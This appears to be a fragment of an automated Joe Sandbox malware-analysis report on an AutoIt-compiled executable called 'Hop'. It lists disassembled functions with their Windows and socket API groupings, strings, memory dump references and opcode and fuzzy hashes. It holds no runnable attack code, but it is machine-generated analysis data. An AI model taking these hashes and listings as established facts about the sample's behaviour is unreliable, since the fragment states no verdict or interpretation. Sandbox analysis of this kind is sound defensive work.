                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBA19722A18A12C6FB149BA5C5843BC67A0BF84B98F15513ADE0FD7696DF3CE481C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C431E2C Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                                                                                                                                                                                                                          • Instruction ID: e5afdeb670069c5ef6205da06f001a874c506ba288440a1b8793a97edbdaf2c1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2A18E72A186C4C7D7748F19A400A6EBB75FBD5B98F144129EA8A53B69CF3CD482CF00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E02A8 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$Enabled
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3694350264-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d5677c1c27fae0ef160d1132ecce4b55362bca9ee8861c67a6c6cf8451eff2c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C491A072E09646C6FB74DB55A5503B96391BF847B8F46403ACA6D83692CF3CE4D0E700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DB0F8 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 161812096-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                                                                                                                                                                                                                          • Instruction ID: 665de8d5ee84cadd7c4ecddff3124b259fc72e589933146afe6fc8c7f9c2b842
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C413736A05A45C5EB50DF62E8846AD37B1FF88B98F15403ADE0E97B64CF38E489C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DB754 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                          • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5006a295386250b180ac8e9d7d855b6a2565bdfddaaf2c0510d727d3aea87fab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F311776A18681CAE360CF25B454B1AB661FB88794F109129EA9983F59CF3CD485CB40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C433E24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Create$Show
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3$d$edit
                                                                                                                                                                                                                                                                                                          • API String ID: 2813641753-2600919596
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 48f3d865293d3fb1b1257ef962cab01ae64ab439bd80ff65ef83bfd8cd355cf6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8214A72A2CB41C7EB50CB14F89836977E0FB987A9F110238E68D86A54CFBDD094CB40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C43D6F0 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3220332590-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 27bef40936f05652d3a4a6e04c3d99bab79d32cbdb4f2e6354c4d9b7be019caf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4A1E66AA28253C5E7288F758404BBD33A0FF44B5CF145139EE6AC7A94EF3DA881D310
                                                                                                                                                                                                                                                                                                          Function 00007FF68C459EE4 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: f$p
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1290815066
                                                                                                                                                                                                                                                                                                          • Opcode ID: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 323213d0522d5ea63b838f7ebac3d0d84d2e6cf7be877d24706cf03e2a779e2f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B712B222E1C257C6FF209A14E00467A7661FF5176CF988239E6A9876C8CFBDE5C1DB10
                                                                                                                                                                                                                                                                                                          Function 00007FF68C49B314 Relevance: 9.2, APIs: 6, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B329
                                                                                                                                                                                                                                                                                                          • #9.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3AE
                                                                                                                                                                                                                                                                                                          • #10.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3BA
                                                                                                                                                                                                                                                                                                          • #9.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3C5
                                                                                                                                                                                                                                                                                                          • #2.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3F5
                                                                                                                                                                                                                                                                                                          • #10.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B457
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b944fa95e8004659c407fa35eeeca6e7f33f47781130ff5ca31c44eed8f50fe
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A715031A18262C2EA749F25979407C63A1FF55BACF14413AD74E877A1DF2CE9ACC301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C440350 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                                                                          • API String ID: 0-2263619337
                                                                                                                                                                                                                                                                                                          • Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7128b761d51198f9a19163d6f8e6c867df017453afe444f654ab548abd6389b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0517F22F4AA46C6EB20DF65D0446BC3365FF84B8CF648139DA0D9779ADE79D492C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C431B30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2592858361-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0bfeba3f9b55ce13166799b85d9264de683f170451d07e45e922866353882aed
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28519E72A08792C6EB20CB25E4547B937A0FF89B98F154239DA5D87BA5CF7DE481C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C49BD00 Relevance: 9.1, APIs: 6, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 450394209-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                                                                                                                                                                                                                          • Instruction ID: d761f1e2fa3e768b7d00c58e119a2a10aa8b923334d8131694ea8580486c198a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6117272B18696C7E764CB11A44036963B1BFC5B98F144139DB4D87B28DF3DE488C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C461D04 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2082702847-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6895d5f72473a63971ab592ea91f26169323d28f4d2368b3e89a7f882d6dd71
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
